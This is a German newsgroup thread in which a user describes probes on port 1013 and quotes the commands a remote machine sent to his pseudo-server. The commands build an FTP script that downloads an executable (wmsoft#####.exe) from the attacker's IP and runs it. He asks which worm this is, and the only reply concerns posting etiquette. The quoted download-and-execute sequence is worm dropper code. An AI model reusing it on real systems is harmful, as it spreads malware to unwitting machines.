was so alles aus dem internet daherkommt...

22/11/2008 - 22:55 von Andreas Leitgeb | Report spam
Hab neulich ein bisserl mit Wireshark gepielt, und mal
beobachtet, was so an Anfragen auf meinen Rechner rein-
kommt. Darunter waren auch Verbindungsversuche auf
Port 1013. Ich hab dann einen pseudo-server gemacht,
und sowas kam in etwa dabei raus (das hat alles der
fremde Rechner geschickt):

echo open 91.x.y.z 4381 > i
echo user xtrxoi xtrxoi >> i
echo get wmsoft16058.exe >> i
echo quit >> i
ftp -n -s:i
start wmsoft16058.exe
wmsoft16058.exe

Kennt jemand den wurm/trojaner/... der sich so verbreiten
will? sowohl username als auch exakter dateiname variieren
dabei von mal zu mal (nur das wmsoft#####.exe schema scheint
gleichbleibend). Die IP adresse ist jeweils gleich der source-
adresse der verbindung. Der ftp-server liefert fuer jeden
get dieselbe datei, und ist sonst nicht sehr gespraechig.
Was fuer ein port kann 1013 sein, dass dahinter offenbar
eine kommando-shell erwartet wird? Am absendenden Rechner
ist der 1013er jeweils nicht offen.
 

Lesen sie die antworten

#1 Ralph Aichinger
25/11/2008 - 11:04 | Warnen spam
Raimund Macek wrote:
Entschuldige konfiguriere gerade meine Newsmails-Kontoeinstellungen war
zuviel des guten!



Bitte stell dieses Mime-Multipart (oder was auch immer das
ist) ab. News-Postings sollen reiner Text sein. Und dreh
bitte auch die vcard unten ab. Wenn du was anhàngen willst,
dann nimm eine Textsignatur.

[-- text/x-vcard, encoding 7bit, charset: utf-8, 10 lines, name: raimund_macek.vcf --]



Danke!

/ralph
http://www.flickr.com/photos/sooperkuh/

Ähnliche fragen